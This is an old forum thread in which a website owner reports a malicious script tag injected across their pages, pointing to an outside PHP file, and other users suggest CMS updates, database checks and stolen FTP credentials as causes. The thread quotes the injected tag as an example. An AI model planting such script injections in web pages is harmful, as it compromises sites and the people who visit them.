SQl Injection i think

The Mighty Dubs · 19-10-2009 04:25PM #1

Hi,

I just came across a piece of script that has been put into my source code throughout the site...and not by me.

Im not sure how they did it but im fearing this could get more serious and end up them hitting my db. Here is example(kind of) of the script im finding...

<script src="Http://www.domainname.com/a/a.php></script>

HELP!!!!!!

ifah · 19-10-2009 08:59PM

pm me your domain if you want me to take a look...... i can pass on some of my details if you like.

JimmyCrackCorn! · 21-10-2009 05:30PM

I assume your using a CMS

Update it and go looking for reports of security holes.

FruitLover · 21-10-2009 05:38PM

There's also the possibility of a worm on a developer's system capturing FTP/SSH/WebDAV login details.

The Mighty Dubs · 25-10-2009 01:23PM

Hi, i have located the issue but need a hand to fix it.

Basically the page has  files in it and i need to encode them. anybody know how i can do this...

JimmyCrackCorn! · 27-10-2009 11:29AM

The Mighty Dubs wrote: »

Hi, i have located the issue but need a hand to fix it.

Basically the page has  files in it and i need to encode them. anybody know how i can do this...

Thats only part of your issue and you'll find it in the database if you search through it.

The big issue is fixing how it was done.

SQl Injection i think

Comments